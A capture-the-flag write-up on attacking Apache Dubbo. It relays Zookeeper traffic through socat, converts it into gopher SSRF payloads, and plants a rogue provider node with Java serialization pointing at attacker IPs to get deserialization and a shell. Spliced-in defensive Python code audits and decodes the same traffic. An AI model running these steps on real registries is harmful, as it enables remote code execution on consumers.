XCTF-final-dubbo
XCTF-dubbo
First, we need to know what Dubbo is:
https://dubbo.apache.org/zh/docs/introduction/
The official Dubbo explanation:
Node roles:
Provider: the service provider that exposes services.
Consumer: the service consumer that calls remote services.
Registry: the registry for service registration and discovery.
Monitor: the monitoring center that counts service invocations and invocation times.
Container: the container the service runs in.
Call relationships:
0 The service container is responsible for starting, loading and running the service provider.
1 On startup, the service provider registers the services it provides with the registry.
2 On startup, the service consumer subscribes to the services it needs from the registry.
3 The registry returns the list of provider addresses to the consumer; when the list changes, the registry pushes the changed data to the consumer over a long-lived connection.
4 The service consumer picks one provider from the address list using a soft load-balancing algorithm and calls it; if the call fails, it picks another one.
5 The consumer and the provider accumulate call counts and call times in memory and send the statistics to the monitoring center once a minute.
Attacking Zookeeper
Now that we have a basic understanding of Dubbo and Zookeeper, let's set up a local environment.
First download Zookeeper, then start the Provider and Consumer from source.
Capture packets while talking to Zookeeper:
socat -v -x tcp-listen:9992,fork tcp-connect:127.0.0.1:2181
This listens on port 9992 and forwards the traffic to Zookeeper on 2181. So if we point the CLI at port 9992, the traffic is relayed to the Zookeeper service on 2181, and socat in the middle captures it.
Then we can turn that traffic into gopher packets to send the data.
You can see that bytes 0 to 48 are the packet that every connection to Zookeeper starts with, so every attack has to put it first.
Since no Dubbo service is running in Kali, start the service on Windows, then forward and capture the traffic.
The red box marks the traffic for ls /.
socat -v -v -x tcp-listen:9990,fork tcp-connect:192.168.75.1:2181
zkCli.cmd -server 192.168.75.137:9990
This gives a clear view of the structure inside Zookeeper.
Under /dubbo/dubbo.service.DemoService/providers/ we find:
dubbo%3A%2F%2F169.254.102.52%3A20880%2Fdubbo.service.DemoService%3Fanyhost%3Dtrue%26application%3Ddubbo-provider%26deprecated%3Dfalse%26dubbo%3D2.0.2%26dynamic%3Dtrue%26generic%3Dfalse%26interface%3Ddubbo.service.DemoService%26metadata-type%3Dremote%26methods%3DsayHello%26pid%3D40620%26release%3D2.7.8%26revision%3D1.0.0%26side%3Dprovider%26timestamp%3D1634887913064%26version%3D1.0.0
Decoded, that is:
dubbo://169.254.102.52:20880/dubbo.service.DemoService?anyhost=true&application=dubbo-provider&deprecated=false&dubbo=2.0.2&dynamic=true&generic=false&interface=dubbo.service.DemoService&metadata-type=remote&methods=sayHello&pid=40620&release=2.7.8&revision=1.0.0&side=provider&timestamp=1634887913064&version=1.0.0
Because this is local, the protocol address here is the 169.x one; the internal IP was not picked up.
According to https://xz.aliyun.com/t/7354, all we need is to make it use Java deserialization. In the end we push the traffic in with gopher.
We modify this node following that article.
After the change it is:
dubbo://139.199.203.253:20890/dubbo.service.DemoService?anyhost=true&application=dubbo-provider&bean.name=ServiceBean:dubbo.service.DemoService:1.0.0&deprecated=false&dubbo=2.0.2&dynamic=true&generic=false&interface=dubbo.service.DemoService&methods=sayHello&pid=41643&register=true&release=2.7.3&revision=1.0.0&side=provider&serialization=java&timestamp=1605961792779&version=1.0.0 139.199.203.253
The main change here is serialization=java.
So we need to create this node; the command is:
create /dubbo/dubbo.service.DemoService/providers/dubbo%3A%2F%2F139.199.203.253%3A20890%2Fdubbo.service.DemoService%3Fanyhost%3Dtrue%26application%3Ddubbo-provider%26bean.name%3DServiceBean%3Adubbo.service.DemoService%3A1.0.0%26deprecated%3Dfalse%26dubbo%3D2.0.2%26dynamic%3Dtrue%26generic%3Dfalse%26interface%3Ddubbo.service.DemoService%26methods%3DsayHello%26pid%3D41643%26register%3Dtrue%26release%3D2.7.3%26revision%3D1.0.0%26side%3Dprovider%26serialization%3djava%26timestamp%3D1605961792779%26version%3D1.0.0 139.199.203.253
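The node names above are nothing more than percent-encoded dubbo:// URLs, and that URL is all the consumer sees before it picks a provider. As an added example (not code from the original write-up), here is a small Python audit that decodes such node names and flags registrations a consumer should not trust, such as a provider advertising serialization=java or a host outside the network where real providers run; the sample node names, the allowed network and the helper names are constructed for this example.

```python
"""Audit Dubbo provider registrations read from the Zookeeper registry.

Added example (not from the original write-up); node names, networks and
helper names below are constructed.
"""
import ipaddress
from urllib.parse import parse_qs, unquote, urlparse

# Dubbo serialization names backed by JDK ObjectInputStream; a provider that
# advertises one makes the consumer deserialize its responses natively.
RISKY_SERIALIZATIONS = {"java", "compactedjava", "nativejava"}

# Constructed sample node names (same shape as the zkCli "ls" output above).
SAFE_NODE = ("dubbo%3A%2F%2F10.0.0.5%3A20880%2Fdemo.DemoService%3Fanyhost%3Dtrue"
             "%26interface%3Ddemo.DemoService%26methods%3DsayHello%26side%3Dprovider")
RISKY_NODE = ("dubbo%3A%2F%2F203.0.113.9%3A20890%2Fdemo.DemoService%3Fanyhost%3Dtrue"
              "%26interface%3Ddemo.DemoService%26serialization%3djava%26side%3Dprovider")
ALLOWED_NETS = [ipaddress.ip_network("10.0.0.0/8")]  # where real providers live


def decode_provider_node(node: str) -> dict:
    """Percent-decode one provider node name and split the dubbo:// URL."""
    url = urlparse(unquote(node))
    params = {k: v[0] for k, v in parse_qs(url.query).items()}
    return {"host": url.hostname, "port": url.port,
            "interface": url.path.lstrip("/"), "params": params}


def audit_provider(node: str, allowed_nets) -> list:
    """Return findings for one registration; an empty list means it looks clean."""
    info = decode_provider_node(node)
    findings = []
    ser = info["params"].get("serialization", "hessian2")  # Dubbo's default
    if ser.lower() in RISKY_SERIALIZATIONS:
        findings.append(f"serialization={ser} advertised by {info['host']}")
    try:
        addr = ipaddress.ip_address(info["host"])
        if not any(addr in net for net in allowed_nets):
            findings.append(f"provider host {addr} outside allowed networks")
    except ValueError:
        findings.append(f"provider host {info['host']!r} is not an IP literal")
    if info["params"].get("side") != "provider":
        findings.append("node under providers/ is not side=provider")
    return findings


def audit_registry(nodes, allowed_nets=ALLOWED_NETS) -> dict:
    """Map each suspicious node to its findings; clean nodes are omitted."""
    return {n: f for n in nodes if (f := audit_provider(n, allowed_nets))}
```

Run it over the real children of the providers/ path (from zkCli or a Zookeeper client library) to spot a registration that was planted rather than published by a provider you run.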
So let's first simulate it in the shell and then convert it to gopher form. Try sending it with curl to see whether the node gets created. For the gopher conversion I recommend CyberChef.
Then URL-encode it a second time and add the gopher prefix.
So what follows is the process of capturing the traffic => turning it into the gopher protocol.
First send the login traffic, then the create traffic, forging our own malicious provider.
Here I first create a malicious server, then capture that part of the traffic and convert it to gopher.
Then I prepend the gopher part from logging in to Zookeeper earlier.
I delete this thing first. Now fire the gopher (with an SSRF point started locally).
After sending the traffic, something new has been created. That is our malicious provider. After that just change the IP.
Attacking the consumer
Then get our Java exploit ready.
Writing the Java exploit just means following this and fuzzing the gadget chain:
https://github.com/threedr3am/learnjavabug/tree/master/dubbo/src/main/java/com/threedr3am/bug/dubbo
https://github.com/LFYSec/XCTF2021Final-Dubbo
If we can control the data the provider returns, then there is a Java deserialization vulnerability here.
Once packaged, put it on a server and run it as the malicious provider server.
Then change the IP above to our server's IP and push the data into Zookeeper.
Now Zookeeper holds both the real address and the malicious one; because of load balancing, the consumer picks one provider at random to connect to. When it connects to the malicious provider, the deserialization is triggered.
So every time we get an output here, a command is executed. Reproduced successfully.
Attacking the remote target
Next we go for the remote target. First capture the traffic, starting with the connection traffic.
The red box marks the connection traffic; we convert it to gopher traffic the same way as above.
%00%00%00%2d%00%00%00%00%00%00%00%00%00%00%00%00%00%00%75%30%00%00%00%00%00%00%00%00%00%00%00%10%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00
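What those 49 bytes are, as an added example that is not part of the original write-up: Zookeeper prefixes each request with a 4-byte length, and the record that follows is a ConnectRequest. The decoder below, fed the capture above re-typed field by field, shows why the text says bytes 0 to 48 belong to every connection; the function names are my own.

```python
"""Decode the Zookeeper ConnectRequest frame captured above.

Added example, not from the original write-up. Zookeeper prefixes every
request with a 4-byte big-endian length; a ConnectRequest record then holds
protocolVersion (int), lastZxidSeen (long), timeOut (int), sessionId (long),
a length-prefixed passwd buffer and, for 3.4+ clients, a readOnly boolean.
"""
import struct
from urllib.parse import unquote_to_bytes

# The capture quoted in the write-up, re-typed field by field (49 bytes).
CONNECT_HEX = ("%00%00%00%2d"                # length of the record: 45
               + "%00" * 14 + "%75%30"       # protocolVersion, lastZxidSeen, timeOut=30000
               + "%00" * 11 + "%10"          # sessionId=0, passwd length=16
               + "%00" * 17)                 # 16-byte passwd, readOnly=false


def parse_connect_request(frame: bytes) -> dict:
    """Parse one length-prefixed ConnectRequest; raises ValueError if short."""
    if len(frame) < 4:
        raise ValueError("no length prefix")
    (length,) = struct.unpack_from(">i", frame, 0)
    body = frame[4:4 + length]
    if len(body) != length or length < 28:
        raise ValueError(f"record claims {length} bytes, got {len(body)}")
    proto, zxid, timeout, session, pw_len = struct.unpack_from(">iqiqi", body, 0)
    passwd = body[28:28 + pw_len]
    if len(passwd) != pw_len:
        raise ValueError("passwd buffer runs past the end of the record")
    tail = body[28 + pw_len:]
    return {
        "frame_len": 4 + length,
        "protocol_version": proto,
        "last_zxid_seen": zxid,
        "timeout_ms": timeout,
        "session_id": session,
        "passwd": passwd,
        # Missing on pre-3.4 clients; a non-zero byte requests read-only mode.
        "read_only": bool(tail[0]) if tail else None,
    }


def parse_captured_connect() -> dict:
    """Decode the capture quoted in the write-up."""
    return parse_connect_request(unquote_to_bytes(CONNECT_HEX))
```

A session id and password of all zeros is what a fresh client sends; a capture with a non-zero session id is a client trying to resume an existing session.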
Then we simulate inserting the malicious provider:
create /dubbo/dubbo.service.DemoService/providers/dubbo%3A%2F%2F47.97.123.81%3A20890%2Fdubbo.service.DemoService%3Fanyhost%3Dtrue%26application%3Ddubbo-provider%26bean.name%3DServiceBean%3Adubbo.service.DemoService%3A1.0.0%26deprecated%3Dfalse%26dubbo%3D2.0.2%26dynamic%3Dtrue%26generic%3Dfalse%26interface%3Ddubbo.service.DemoService%26methods%3DsayHello%26pid%3D41643%26register%3Dtrue%26release%3D2.7.3%26revision%3D1.0.0%26side%3Dprovider%26serialization%3djava%26timestamp%3D1605961792779%26version%3D1.0.0
Capture the packet and convert it to gopher.
Then join the two parts together, wrap them in gopher and fire at the local instance. Inserted successfully.
Then we can go for the remote server.
Upload the Java exploit to the VPS.
The remote target is a bit problematic: locally the data goes in, but remotely it just doesn't work. (Maybe an environment issue?)
Do the create manually and get a shell back.